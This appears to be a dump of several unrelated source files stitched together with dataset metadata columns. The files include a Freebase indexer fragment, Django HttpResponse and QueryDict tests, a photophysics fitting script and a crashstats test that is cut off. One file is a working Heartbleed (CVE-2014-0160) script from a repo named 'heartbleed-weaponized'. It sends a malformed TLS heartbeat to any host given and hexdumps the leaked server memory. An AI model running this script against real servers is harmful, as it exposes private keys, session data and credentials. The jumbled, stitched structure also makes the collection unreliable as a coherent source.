for result in response['result']:
#print result['mid']
#print result
if description:
try:
freebase_url=self.freebase_topic_url.format(result["mid"],self.freebase_key)
content = requests.get(freebase_url).json()
content=content["property"]["/common/topic/description"]["values"][0]["value"]
result["content"]=content
except:
pass
#print result
#print content, freebase_topic_url.format(result["mid"],api_key)
else:
result["content"]=""
result["reference"] = result.pop("mid")
result["title"] = result.pop("name")
#characters= result["issues"];
#if characters:
# characters=map(lambda x: x.get('characters_on_cover',[]) ,characters )
# characters=reduce(lambda x, y: x+y, characters)
#result["featured_characters"]+=characters
#result.pop('issues')
result= self.flatten(result)
result= self.flattenlists(result)
if category:
result= self.standardize(result)
result=self.prepareCategory(result)
if result==0:
continue
#print result
if "authorname" in result:
result["category"]=result["authorname"]
index.pushDoc(result)
#print json.dumps(flatten(result),indent=4)
#print result["continues"]
try:
print "trying to index"
print index.commit(async=True).jobID
except:
print "indexing failed"
# try:
# print "trying to index"
# except:
# print "indexing failed"
return response.get("cursor")
def do_query_category(self,index,cursor=""):
self.params['cursor']=cursor
url = self.service_url + '?' + urllib.urlencode(self.params)
response = requests.get(url).json()#json.loads(urllib2.urlopen(url).read())
try:
a=response['result']
except:
print response
for result in response['result']:
#print result['mid']
#print result
if self.description:
try:
freebase_url=self.freebase_topic_url.format(result["mid"],self.params["key"])
content = requests.get(freebase_url).json()
content=content["property"]["/common/topic/description"]["values"][0]["value"]
result["content"]=content
except:
pass
#print result
#print content, freebase_topic_url.format(result["mid"],api_key)
else:
result["content"]=""
result["reference"] = result.pop("mid")
result["title"] = result.pop("name")
#characters= result["issues"];
#if characters:
# characters=map(lambda x: x.get('characters_on_cover',[]) ,characters )
# characters=reduce(lambda x, y: x+y, characters)
#result["featured_characters"]+=characters
#result.pop('issues')
result= self.flatten(result)
result= self.flattenlists(result)
result= self.standardize(result)
result=self.prepareCategory(result)
index.pushDoc(result)
#print json.dumps(flatten(result),indent=4)
#print result["continues"]
#print index.name
try:
print "trying to index"
print index.commit(async=True).jobID
except:
print "indexing failed"
return response.get("cursor")
def standardize(self,result):
#print result,"hello"
for k,v in result.iteritems():
splits = k.split("/")
#print len(splits)
if len(splits)>1:
result[splits[len(splits)-1]]=v
result.pop(k)
if 'key_namespace' in result:
result.pop('key_namespace')
result['wikipedia_url']="http://en.wikipedia.org/wiki/index.html?curid=%s" % result.pop("key_value")
return result
def prepareCategory(self,result):
phrase = result["title"]
if not phrase:
return 0
rest='("'+phrase+'") '
content=phrase+" "
#print result
for aliaskey in self.aliases:
for alias in result[aliaskey]:
content+=alias+" "
rest+=" OR (\"%s\") " % alias
if "," in phrase:
phrase =phrase.split(',')[0]
rest+="OR (\"%s\") " % phrase
if "Street" in phrase:
rest+=" OR (\"%s\") " % phrase.replace("Street","")
result['booleanrestriction']=rest
result['content']=content
return result
def flatten(self,obj, key=""):
key=key.split(":")[0]
if type(obj) is dict:
orig=dict(obj)
for k,v in obj.iteritems():
#print k,v
#key=key.split(":")[0]
#splits = key.split("/")
#print len(splits)
#key=splits[len(splits)-1]
newkey=""
if key:
newkey=key+"_"
newkey+=k
if type(v) is dict:
orig.update(self.flatten(v,newkey))
orig.pop(k)
elif type(v) is list:
flatlist=self.flatten(v,newkey);
if flatlist:
orig.update(flatlist)
orig.pop(k)
#print flatten(val,newkey)
#orig.update(flatten(v,newkey))
else:
if key:
orig[newkey]=v
orig.pop(k)
return orig
if type(obj) is list:
new={}
for a in obj:
if type(a) is dict:
#key=key.split(":")[0]
for k,v in self.flatten(a,key).iteritems():
#print new.get(k,[]).append(v)
#print k,v
if type(v) is list:
k=key+"_"+k
new[k]=new.get(k,[])
new[k].append(v)
if not new:
return False
return new
return obj
def flattenlists(self,obj):
for k,v in obj.iteritems():
if type(v) is list and len(v)>0 and not isinstance(v[0], basestring):
obj[k]=list(itertools.chain(*v))
return obj
| mit | 4,380,003,460,438,810,000 | 31.508065 | 111 | 0.499504 | false |
johnmarkschofield/heartbleed-weaponized | takeshixx.py | 1 | 4770 | #!/usr/bin/env python2
# Quick and dirty demonstration of CVE-2014-0160 by Jared Stafford ([email protected])
# The author disclaims copyright to this source code.
import sys
import struct
import socket
import time
import select
import re
from optparse import OptionParser
options = OptionParser(usage='%prog server [options]', description='Test for SSL heartbeat vulnerability (CVE-2014-0160)')
options.add_option('-p', '--port', type='int', default=443, help='TCP port to test (default: 443)')
options.add_option('-s', '--starttls', action='store_true', default=False, help='Check STARTTLS')
options.add_option('-d', '--debug', action='store_true', default=False, help='Enable debug output')
def h2bin(x):
return x.replace(' ', '').replace('\n', '').decode('hex')
hello = h2bin('''
16 03 02 00 dc 01 00 00 d8 03 02 53
43 5b 90 9d 9b 72 0b bc 0c bc 2b 92 a8 48 97 cf
bd 39 04 cc 16 0a 85 03 90 9f 77 04 33 d4 de 00
00 66 c0 14 c0 0a c0 22 c0 21 00 39 00 38 00 88
00 87 c0 0f c0 05 00 35 00 84 c0 12 c0 08 c0 1c
c0 1b 00 16 00 13 c0 0d c0 03 00 0a c0 13 c0 09
c0 1f c0 1e 00 33 00 32 00 9a 00 99 00 45 00 44
c0 0e c0 04 00 2f 00 96 00 41 c0 11 c0 07 c0 0c
c0 02 00 05 00 04 00 15 00 12 00 09 00 14 00 11
00 08 00 06 00 03 00 ff 01 00 00 49 00 0b 00 04
03 00 01 02 00 0a 00 34 00 32 00 0e 00 0d 00 19
00 0b 00 0c 00 18 00 09 00 0a 00 16 00 17 00 08
00 06 00 07 00 14 00 15 00 04 00 05 00 12 00 13
00 01 00 02 00 03 00 0f 00 10 00 11 00 23 00 00
00 0f 00 01 01
''')
hb = h2bin('''
18 03 02 00 03
01 40 00
''')
def hexdump(s):
for b in xrange(0, len(s), 16):
lin = [c for c in s[b : b + 16]]
hxdat = ' '.join('%02X' % ord(c) for c in lin)
pdat = ''.join((c if 32 <= ord(c) <= 126 else '.' )for c in lin)
print ' %04x: %-48s %s' % (b, hxdat, pdat)
print
def recvall(s, length, timeout=5):
endtime = time.time() + timeout
rdata = ''
remain = length
while remain > 0:
rtime = endtime - time.time()
if rtime < 0:
return None
r, w, e = select.select([s], [], [], 5)
if s in r:
data = s.recv(remain)
# EOF?
if not data:
return None
rdata += data
remain -= len(data)
return rdata
def recvmsg(s):
hdr = recvall(s, 5)
if hdr is None:
print 'Unexpected EOF receiving record header - server closed connection'
return None, None, None
typ, ver, ln = struct.unpack('>BHH', hdr)
pay = recvall(s, ln, 10)
if pay is None:
print 'Unexpected EOF receiving record payload - server closed connection'
return None, None, None
print ' ... received message: type = %d, ver = %04x, length = %d' % (typ, ver, len(pay))
return typ, ver, pay
def hit_hb(s):
s.send(hb)
while True:
typ, ver, pay = recvmsg(s)
if typ is None:
print 'No heartbeat response received, server likely not vulnerable'
return False
if typ == 24:
print 'Received heartbeat response:'
hexdump(pay)
if len(pay) > 3:
print 'WARNING: server returned more data than it should - server is vulnerable!'
else:
print 'Server processed malformed heartbeat, but did not return any extra data.'
return True
if typ == 21:
print 'Received alert:'
hexdump(pay)
print 'Server returned error, likely not vulnerable'
return False
def main():
opts, args = options.parse_args()
if len(args) < 1:
options.print_help()
return
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
print 'Connecting...'
sys.stdout.flush()
s.connect((args[0], opts.port))
if opts.starttls:
re = s.recv(4096)
if opts.debug: print re
s.send('ehlo starttlstest\n')
re = s.recv(1024)
if opts.debug: print re
if not 'STARTTLS' in re:
if opts.debug: print re
print 'STARTTLS not supported...'
sys.exit(0)
s.send('starttls\n')
re = s.recv(1024)
print 'Sending Client Hello...'
sys.stdout.flush()
s.send(hello)
print 'Waiting for Server Hello...'
sys.stdout.flush()
while True:
typ, ver, pay = recvmsg(s)
if typ == None:
print 'Server closed connection without sending Server Hello.'
return
# Look for server hello done message.
if typ == 22 and ord(pay[0]) == 0x0E:
break
print 'Sending heartbeat request...'
sys.stdout.flush()
s.send(hb)
hit_hb(s)
if __name__ == '__main__':
main()
| mit | -2,765,998,675,257,244,700 | 30.176471 | 122 | 0.57652 | false |
nakayamaqs/PythonModule | Learning/func_return.py | 1 | 1354 | # from :http://docs.python.org/3.3/faq/programming.html#what-is-the-difference-between-arguments-and-parameters
# By returning a tuple of the results:
def func2(a, b):
a = 'new-value' # a and b are local names
b = b + 1 # assigned to new objects
return a, b # return new values
x, y = 'old-value', 99
x, y = func2(x, y)
print(x, y) # output: new-value 100
# By passing a mutable (changeable in-place) object:
def func1(a):
a[0] = 'new-value' # 'a' references a mutable list
a[1] = a[1] + 1 # changes a shared object
args = ['old-value', 99]
func1(args)
print(args[0], args[1]) # output: new-value 100
# By passing in a dictionary that gets mutated:
def func3(args):
args['a'] = 'new-value' # args is a mutable dictionary
args['b'] = args['b'] + 1 # change it in-place
args = {'a':' old-value', 'b': 99}
func3(args)
print(args['a'], args['b'])
# Or bundle up values in a class instance:
class callByRef:
def __init__(self, **args):
for (key, value) in args.items():
setattr(self, key, value)
def func4(args):
args.a = 'new-value by func4.' # args is a mutable callByRef
args.b = args.b + 100 # change object in-place
args = callByRef(a='old-value', b=99,c=23)
func4(args)
print(args.a, args.b, args.c)
| mit | 7,679,583,819,250,892,000 | 28.434783 | 111 | 0.595273 | false |
googleapis/python-game-servers | samples/snippets/noxfile_config.py | 1 | 1607 | # Copyright 2020 Google LLC
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# Default TEST_CONFIG_OVERRIDE for python repos.
# You can copy this file into your directory, then it will be inported from
# the noxfile.py.
# The source of truth:
# https://github.com/GoogleCloudPlatform/python-docs-samples/blob/master/noxfile_config.py
TEST_CONFIG_OVERRIDE = {
# You can opt out from the test for specific Python versions.
"ignored_versions": ["2.7"],
# Old samples are opted out of enforcing Python type hints
# All new samples should feature them
"enforce_type_hints": False,
# An envvar key for determining the project id to use. Change it
# to 'BUILD_SPECIFIC_GCLOUD_PROJECT' if you want to opt in using a
# build specific Cloud project. You can also use your own string
# to use your own Cloud project.
# "gcloud_project_env": "GOOGLE_CLOUD_PROJECT",
"gcloud_project_env": "BUILD_SPECIFIC_GCLOUD_PROJECT",
# A dictionary you want to inject into your test. Don't put any
# secrets here. These values will override predefined values.
"envs": {},
}
| apache-2.0 | -1,290,368,420,881,174,500 | 41.289474 | 90 | 0.729932 | false |
disqus/django-old | tests/regressiontests/httpwrappers/tests.py | 1 | 12019 | import copy
import pickle
from django.http import (QueryDict, HttpResponse, SimpleCookie, BadHeaderError,
parse_cookie)
from django.utils import unittest
class QueryDictTests(unittest.TestCase):
def test_missing_key(self):
q = QueryDict('')
self.assertRaises(KeyError, q.__getitem__, 'foo')
def test_immutability(self):
q = QueryDict('')
self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar'])
self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
self.assertRaises(AttributeError, q.pop, 'foo')
self.assertRaises(AttributeError, q.popitem)
self.assertRaises(AttributeError, q.clear)
def test_immutable_get_with_default(self):
q = QueryDict('')
self.assertEqual(q.get('foo', 'default'), 'default')
def test_immutable_basic_operations(self):
q = QueryDict('')
self.assertEqual(q.getlist('foo'), [])
self.assertEqual(q.has_key('foo'), False)
self.assertEqual('foo' in q, False)
self.assertEqual(q.items(), [])
self.assertEqual(q.lists(), [])
self.assertEqual(q.items(), [])
self.assertEqual(q.keys(), [])
self.assertEqual(q.values(), [])
self.assertEqual(len(q), 0)
self.assertEqual(q.urlencode(), '')
def test_single_key_value(self):
"""Test QueryDict with one key/value pair"""
q = QueryDict('foo=bar')
self.assertEqual(q['foo'], 'bar')
self.assertRaises(KeyError, q.__getitem__, 'bar')
self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
self.assertEqual(q.get('foo', 'default'), 'bar')
self.assertEqual(q.get('bar', 'default'), 'default')
self.assertEqual(q.getlist('foo'), ['bar'])
self.assertEqual(q.getlist('bar'), [])
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar'])
self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
self.assertTrue(q.has_key('foo'))
self.assertTrue('foo' in q)
self.assertFalse(q.has_key('bar'))
self.assertFalse('bar' in q)
self.assertEqual(q.items(), [(u'foo', u'bar')])
self.assertEqual(q.lists(), [(u'foo', [u'bar'])])
self.assertEqual(q.keys(), ['foo'])
self.assertEqual(q.values(), ['bar'])
self.assertEqual(len(q), 1)
self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
self.assertRaises(AttributeError, q.pop, 'foo')
self.assertRaises(AttributeError, q.popitem)
self.assertRaises(AttributeError, q.clear)
self.assertRaises(AttributeError, q.setdefault, 'foo', 'bar')
self.assertEqual(q.urlencode(), 'foo=bar')
def test_urlencode(self):
q = QueryDict('', mutable=True)
q['next'] = '/a&b/'
self.assertEqual(q.urlencode(), 'next=%2Fa%26b%2F')
self.assertEqual(q.urlencode(safe='/'), 'next=/a%26b/')
q = QueryDict('', mutable=True)
q['next'] = u'/t\xebst&key/'
self.assertEqual(q.urlencode(), 'next=%2Ft%C3%ABst%26key%2F')
self.assertEqual(q.urlencode(safe='/'), 'next=/t%C3%ABst%26key/')
def test_mutable_copy(self):
"""A copy of a QueryDict is mutable."""
q = QueryDict('').copy()
self.assertRaises(KeyError, q.__getitem__, "foo")
q['name'] = 'john'
self.assertEqual(q['name'], 'john')
def test_mutable_delete(self):
q = QueryDict('').copy()
q['name'] = 'john'
del q['name']
self.assertFalse('name' in q)
def test_basic_mutable_operations(self):
q = QueryDict('').copy()
q['name'] = 'john'
self.assertEqual(q.get('foo', 'default'), 'default')
self.assertEqual(q.get('name', 'default'), 'john')
self.assertEqual(q.getlist('name'), ['john'])
self.assertEqual(q.getlist('foo'), [])
q.setlist('foo', ['bar', 'baz'])
self.assertEqual(q.get('foo', 'default'), 'baz')
self.assertEqual(q.getlist('foo'), ['bar', 'baz'])
q.appendlist('foo', 'another')
self.assertEqual(q.getlist('foo'), ['bar', 'baz', 'another'])
self.assertEqual(q['foo'], 'another')
self.assertTrue(q.has_key('foo'))
self.assertTrue('foo' in q)
self.assertEqual(q.items(), [(u'foo', u'another'), (u'name', u'john')])
self.assertEqual(q.lists(), [(u'foo', [u'bar', u'baz', u'another']), (u'name', [u'john'])])
self.assertEqual(q.keys(), [u'foo', u'name'])
self.assertEqual(q.values(), [u'another', u'john'])
self.assertEqual(len(q), 2)
q.update({'foo': 'hello'})
self.assertEqual(q['foo'], 'hello')
self.assertEqual(q.get('foo', 'not available'), 'hello')
self.assertEqual(q.getlist('foo'), [u'bar', u'baz', u'another', u'hello'])
self.assertEqual(q.pop('foo'), [u'bar', u'baz', u'another', u'hello'])
self.assertEqual(q.pop('foo', 'not there'), 'not there')
self.assertEqual(q.get('foo', 'not there'), 'not there')
self.assertEqual(q.setdefault('foo', 'bar'), 'bar')
self.assertEqual(q['foo'], 'bar')
self.assertEqual(q.getlist('foo'), ['bar'])
self.assertEqual(q.urlencode(), 'foo=bar&name=john')
q.clear()
self.assertEqual(len(q), 0)
def test_multiple_keys(self):
"""Test QueryDict with two key/value pairs with same keys."""
q = QueryDict('vote=yes&vote=no')
self.assertEqual(q['vote'], u'no')
self.assertRaises(AttributeError, q.__setitem__, 'something', 'bar')
self.assertEqual(q.get('vote', 'default'), u'no')
self.assertEqual(q.get('foo', 'default'), 'default')
self.assertEqual(q.getlist('vote'), [u'yes', u'no'])
self.assertEqual(q.getlist('foo'), [])
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar', 'baz'])
self.assertRaises(AttributeError, q.setlist, 'foo', ['bar', 'baz'])
self.assertRaises(AttributeError, q.appendlist, 'foo', ['bar'])
self.assertEqual(q.has_key('vote'), True)
self.assertEqual('vote' in q, True)
self.assertEqual(q.has_key('foo'), False)
self.assertEqual('foo' in q, False)
self.assertEqual(q.items(), [(u'vote', u'no')])
self.assertEqual(q.lists(), [(u'vote', [u'yes', u'no'])])
self.assertEqual(q.keys(), [u'vote'])
self.assertEqual(q.values(), [u'no'])
self.assertEqual(len(q), 1)
self.assertRaises(AttributeError, q.update, {'foo': 'bar'})
self.assertRaises(AttributeError, q.pop, 'foo')
self.assertRaises(AttributeError, q.popitem)
self.assertRaises(AttributeError, q.clear)
self.assertRaises(AttributeError, q.setdefault, 'foo', 'bar')
self.assertRaises(AttributeError, q.__delitem__, 'vote')
def test_invalid_input_encoding(self):
"""
QueryDicts must be able to handle invalid input encoding (in this
case, bad UTF-8 encoding).
"""
q = QueryDict('foo=bar&foo=\xff')
self.assertEqual(q['foo'], u'\ufffd')
self.assertEqual(q.getlist('foo'), [u'bar', u'\ufffd'])
def test_pickle(self):
q = QueryDict('')
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q == q1, True)
q = QueryDict('a=b&c=d')
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q == q1, True)
q = QueryDict('a=b&c=d&a=1')
q1 = pickle.loads(pickle.dumps(q, 2))
self.assertEqual(q == q1 , True)
def test_update_from_querydict(self):
"""Regression test for #8278: QueryDict.update(QueryDict)"""
x = QueryDict("a=1&a=2", mutable=True)
y = QueryDict("a=3&a=4")
x.update(y)
self.assertEqual(x.getlist('a'), [u'1', u'2', u'3', u'4'])
def test_non_default_encoding(self):
"""#13572 - QueryDict with a non-default encoding"""
q = QueryDict('sbb=one', encoding='rot_13')
self.assertEqual(q.encoding , 'rot_13' )
self.assertEqual(q.items() , [(u'foo', u'bar')] )
self.assertEqual(q.urlencode() , 'sbb=one' )
q = q.copy()
self.assertEqual(q.encoding , 'rot_13' )
self.assertEqual(q.items() , [(u'foo', u'bar')] )
self.assertEqual(q.urlencode() , 'sbb=one' )
self.assertEqual(copy.copy(q).encoding , 'rot_13' )
self.assertEqual(copy.deepcopy(q).encoding , 'rot_13')
class HttpResponseTests(unittest.TestCase):
def test_unicode_headers(self):
r = HttpResponse()
# If we insert a unicode value it will be converted to an ascii
r['value'] = u'test value'
self.assertTrue(isinstance(r['value'], str))
# An error is raised ~hen a unicode object with non-ascii is assigned.
self.assertRaises(UnicodeEncodeError, r.__setitem__, 'value', u't\xebst value')
# An error is raised when a unicode object with non-ASCII format is
# passed as initial mimetype or content_type.
self.assertRaises(UnicodeEncodeError, HttpResponse,
mimetype=u't\xebst value')
# HttpResponse headers must be convertible to ASCII.
self.assertRaises(UnicodeEncodeError, HttpResponse,
content_type=u't\xebst value')
# The response also converts unicode keys to strings.)
r[u'test'] = 'testing key'
l = list(r.items())
l.sort()
self.assertEqual(l[1], ('test', 'testing key'))
# It will also raise errors for keys with non-ascii data.
self.assertRaises(UnicodeEncodeError, r.__setitem__, u't\xebst key', 'value')
def test_newlines_in_headers(self):
# Bug #10188: Do not allow newlines in headers (CR or LF)
r = HttpResponse()
self.assertRaises(BadHeaderError, r.__setitem__, 'test\rstr', 'test')
self.assertRaises(BadHeaderError, r.__setitem__, 'test\nstr', 'test')
def test_dict_behavior(self):
"""
Test for bug #14020: Make HttpResponse.get work like dict.get
"""
r = HttpResponse()
self.assertEqual(r.get('test'), None)
class CookieTests(unittest.TestCase):
def test_encode(self):
"""
Test that we don't output tricky characters in encoded value
"""
c = SimpleCookie()
c['test'] = "An,awkward;value"
self.assertTrue(";" not in c.output().rstrip(';')) # IE compat
self.assertTrue("," not in c.output().rstrip(';')) # Safari compat
def test_decode(self):
"""
Test that we can still preserve semi-colons and commas
"""
c = SimpleCookie()
c['test'] = "An,awkward;value"
c2 = SimpleCookie()
c2.load(c.output())
self.assertEqual(c['test'].value, c2['test'].value)
def test_decode_2(self):
"""
Test that we haven't broken normal encoding
"""
c = SimpleCookie()
c['test'] = "\xf0"
c2 = SimpleCookie()
c2.load(c.output())
self.assertEqual(c['test'].value, c2['test'].value)
def test_nonstandard_keys(self):
"""
Test that a single non-standard cookie name doesn't affect all cookies. Ticket #13007.
"""
self.assertTrue('good_cookie' in parse_cookie('good_cookie=yes;bad:cookie=yes').keys())
def test_repeated_nonstandard_keys(self):
"""
Test that a repeated non-standard name doesn't affect all cookies. Ticket #15852
"""
self.assertTrue('good_cookie' in parse_cookie('a,=b; a,=c; good_cookie=yes').keys())
def test_httponly_after_load(self):
"""
Test that we can use httponly attribute on cookies that we load
"""
c = SimpleCookie()
c.load("name=val")
c['name']['httponly'] = True
self.assertTrue(c['name']['httponly'])
| bsd-3-clause | 7,767,958,254,567,024,000 | 38.666667 | 99 | 0.585157 | false |
nardorb/OneStop | models/taxi_driver.py | 1 | 1177 | from google.appengine.ext import db
class TaxiDriver(db.Model):
EXCEPTION_NO_PARENT = "`parent` property must be an `Account` object."
name = db.StringProperty(default=None)
email = db.EmailProperty(default=None)
sex = db.StringProperty(default=None)
address = db.StringProperty(default=None)
parish = db.StringProperty(default=None)
tel_number = db.StringProperty(default=None)
# years_with_license = db.StringProperty(default=None)
# road_accidents = db.IntegerProperty(default=None)
driver_id = db.StringProperty(default=None)
is_on_duty = db.BooleanProperty(default=False)
location = db.StringProperty(default=None)
dob = db.StringProperty(default=None)
@classmethod
def get_by_driver_id(cls, driver_id):
return cls.all().filter('driver_id =', driver_id).get()
def get_by_location(self, location):
return None
def put(self, *args, **kwargs):
# This is not at the top to prevent circular imports.
from models.account import Account
parent = self.parent()
if not parent or not isinstance(parent, Account):
raise ValueError(self.EXCEPTION_NO_PARENT)
return super(TaxiDriver, self).put(*args, **kwargs) | gpl-2.0 | 1,523,704,451,616,366,000 | 33.647059 | 72 | 0.724724 | false |
mattbrowley/PSim | Covariances.py | 1 | 7985 | # -*- coding: utf-8 -*-
from __future__ import division
import numpy as np
import PSim
import pickle
import csv
import simplex
fit_type = 'global'
scale = 0.003
with open("pickled_data.p", "r") as file:
pickled_data = pickle.load(file)
powers = pickled_data['powers']
xdata = pickled_data['allxdata']
ydata = pickled_data['allydata']
xarray = pickled_data['xarray']
yarrays = pickled_data['yarrays']
averages = pickled_data['averages']
period = 50 # ns
with open("pickled_data_250.p", "r") as file:
pickled_data_250 = pickle.load(file)
powers_250 = pickled_data_250['powers']
xdata_250 = pickled_data_250['allxdata']
ydata_250 = pickled_data_250['allydata']
xarray_250 = pickled_data_250['xarray']
yarrays_250 = pickled_data_250['yarrays']
averages_250 = pickled_data_250['averages']
period_250 = 1.0 / 250000.0 / 1e-9 # ns
def scalar_min(p, data):
xdata, ydata, ysim = data[0]
xdata_250, ydata_250, ysim_250 = data[1]
scaled_ysim = ysim * p[0]
scaled_ysim_250 = ysim_250 * p[0]
err_20 = 0
err_250 = 0
num_points = 0
for dat, sim in zip(ydata, scaled_ysim):
for x, d, s in zip(xdata, dat, sim):
try:
if s > 0:
log_s = np.log(s)
else:
log_s = 0
log_d = np.log(d)
error = (log_s - log_d)
# error = np.log(error)
err_20 += error*error
num_points = num_points + 1
except:
err_20 += 8e20
err_20 = err_20 / num_points
num_points = 0
for dat, sim in zip(ydata_250[:-1], scaled_ysim_250[:-1]):
for x, d, s in zip(xdata_250, dat, sim):
try:
if s > 0:
log_s = np.log(s)
else:
log_s = 0
log_d = np.log(d)
error = (log_s - log_d)
# error = np.log(error)
if x >= -0.25 and x <= 120:
err_250 += error*error
num_points = num_points + 1
except:
err_250 += 8e20
err_250 = err_250 / num_points
err = np.sqrt(err_250*err_20)
if np.isnan(err):
err = 7e20
fitness = err * 100
return fitness
def evaluate(p):
dummy_x = np.zeros(10)
dummy_y = np.zeros([10, 10])
data = [[dummy_x, dummy_y, dummy_y], [dummy_x, dummy_y, dummy_y]]
if fit_type is 'global' or fit_type is 20: # 20 MHz data
sim = PSim.DecaySim(reprate=20000000, tolerance=0.005, step=5e-12)
sim.trap = p[0]
sim.EHdecay = p[1] * sim.step
sim.Etrap = p[2] * sim.step
sim.FHloss = p[3] * sim.step
sim.Gdecay = p[4] * sim.step
sim.G2decay = p[5] * sim.step
sim.G3decay = p[6] * sim.step
sim.GHdecay = p[7] * sim.step
sim.Gescape = p[8] * sim.step
sim.Gform = p[9] * sim.step * 0
sim.G3loss = p[9] * sim.step
sim.scalar = 1
for power in powers:
sim.addPower(power)
sim.runSim()
interp_signals = []
for this_run in sim.signal:
interp_this = np.interp(xarray, sim.xdata, this_run)
interp_signals.append(interp_this)
interp_signals = np.array(interp_signals)
data[0] = [xarray, yarrays, interp_signals]
if fit_type is 'global' or fit_type is 250: # 250 kHz data
sim_250 = PSim.DecaySim(reprate=250000, tolerance=0.005, step=5e-12)
sim_250.trap = p[0]
sim_250.EHdecay = p[1] * sim_250.step
sim_250.Etrap = p[2] * sim_250.step
sim_250.FHloss = p[3] * sim_250.step
sim_250.Gdecay = p[4] * sim_250.step
sim_250.G2decay = p[5] * sim_250.step
sim_250.G3decay = p[6] * sim_250.step
sim_250.GHdecay = p[7] * sim_250.step
sim_250.Gescape = p[8] * sim_250.step
sim_250.Gform = p[9] * sim_250.step * 0
sim_250.G3loss = p[9] * sim_250.step
sim_250.scalar = 1
for power in powers_250:
sim_250.addPower(power)
sim_250.runSim()
interp_signals_250 = []
for this_run in sim_250.signal:
interp_this = np.interp(xarray_250, sim_250.xdata, this_run)
interp_signals_250.append(interp_this)
interp_signals_250 = np.array(interp_signals_250)
data[1] = [xarray_250, yarrays_250, interp_signals_250]
# Use a simplex minimization to find the best scalar
scalar0 = np.array([3e-26])
ranges = scalar0*0.1
s = simplex.Simplex(scalar_min, scalar0, ranges)
values, fitness, iter = s.minimize(epsilon=0.00001, maxiters=500,
monitor=0, data=data)
scalar = values[0]
#p[-1] = scalar
if scalar < 0:
fitness = 1e30
return fitness
def main():
logname = 'best_{}.log'.format(fit_type)
with open(logname, 'rb') as best_file:
reader = csv.reader(best_file, dialect='excel-tab')
p0 = []
for val in reader.next():
p0.append(np.float(val))
dim = 11
pi = np.ones(dim)
for i, n in enumerate([0,1,2,3,4,5,6,7,8,9,10]):
pi[i] = p0[n]
ps1 = np.ndarray([dim, dim, dim])
ps2 = np.ndarray([dim, dim, dim])
fitness1 = np.ndarray([dim, dim])
fitness2 = np.ndarray([dim, dim])
differences = scale*pi
for i in range(dim):
for j in range(dim):
for k in range(dim):
val1 = pi[k]
val2 = pi[k]
if i == k or j == k:
val1 = val1 + differences[k]
val2 = val2 - differences[k]
ps1[i][j][k] = val1
ps2[i][j][k] = val2
for i in range(dim):
for j in range(i, dim):
fitness1[i][j] = evaluate(ps1[i][j])
fitness1[j][i] = fitness1[i][j]
fitness2[i][j] = evaluate(ps2[i][j])
fitness2[j][i] = fitness2[i][j]
error0 = evaluate(pi)
data = {'fitness1': fitness1,
'fitness2': fitness2,
'differences': differences,
'error0': error0}
with open("covariance_data_{}.p".format(scale), "wb") as file:
pickle.dump(data, file)
hessian = np.ndarray([dim, dim])
for i in range(dim):
for j in range(dim):
if i == j:
d2i = differences[i]
df1 = (fitness1[i][j] - error0) / d2i
df2 = (error0 - fitness2[i][j]) / d2i
hessian[i][j] = (df1 - df2) / (d2i)
else:
df1di1 = (fitness1[i][i] - error0) / differences[i]
df1di2 = (fitness1[i][j] - fitness1[j][j]) / differences[i]
dff1didj = (df1di2 - df1di1) / differences[j]
df2di1 = (error0 - fitness2[i][i]) / differences[i]
df2di2 = (fitness2[j][j] - fitness2[i][j]) / differences[i]
dff2didj = (df2di2 - df2di1) / differences[j]
hessian[i][j] = (dff1didj + dff2didj) / 2
hessian[j][i] = hessian[i][j]
with open("hessian_{}.p".format(scale), "wb") as file:
pickle.dump(hessian, file)
m_hessian = np.matrix(hessian)
covariance = np.linalg.inv(m_hessian)
cv_array = np.array(covariance)
paramaters=['Traps', 'EH_Decay', 'E_Trap', 'TH_loss', 'G_Decay', 'G2_Decay', 'G3_Decay', 'GH_Decay', 'G_Escape', 'G3_Loss']
for i in range(dim):
print('{}{}: {} +- {}'.format(' ' * (8-len(paramaters[i])), paramaters[i], p0[i], np.sqrt(cv_array[i][i])))
with open('Parameters_{}.txt'.format(scale), 'w') as f:
writer = csv.writer(f, dialect="excel-tab")
for i in range(10):
error = np.sqrt(cv_array[i][i])
relerror = error / pi[i] * 100
words = '{}{}: {} +- {} ({}%)'.format(' ' * (8-len(paramaters[i])), paramaters[i], pi[i], error, relerror)
print(words)
writer.writerow([words])
if __name__ == '__main__':
main()
| mit | 8,866,360,628,721,313,000 | 35.295455 | 127 | 0.520726 | false |
mozilla/socorro | webapp-django/crashstats/exploitability/tests/test_views.py | 1 | 5320 | # This Source Code Form is subject to the terms of the Mozilla Public
# License, v. 2.0. If a copy of the MPL was not distributed with this
# file, You can obtain one at http://mozilla.org/MPL/2.0/.
import pyquery
from django.conf import settings
from django.urls import reverse
from crashstats.crashstats import models
from crashstats.crashstats.tests.test_views import BaseTestViews
from crashstats.supersearch.models import SuperSearchUnredacted
class TestViews(BaseTestViews):
def test_exploitability_report(self):
models.BugAssociation.objects.create(
bug_id=111111111, signature="FakeSignature 1"
)
models.BugAssociation.objects.create(
bug_id=222222222, signature="FakeSignature 3"
)
models.BugAssociation.objects.create(
bug_id=101010101, signature="FakeSignature"
)
url = reverse("exploitability:report")
queried_versions = []
def mocked_supersearch_get(**params):
assert params["product"] == ["WaterWolf"]
queried_versions.append(params.get("version"))
assert params["_aggs.signature"] == ["exploitability"]
assert params["_facets_size"] == settings.EXPLOITABILITY_BATCH_SIZE
assert params["exploitability"]
assert params["_fields"]
facets = [
{
"count": 229,
"facets": {
"exploitability": [
{"count": 210, "term": "none"},
{"count": 19, "term": "low"},
]
},
"term": "FakeSignature 1",
},
{
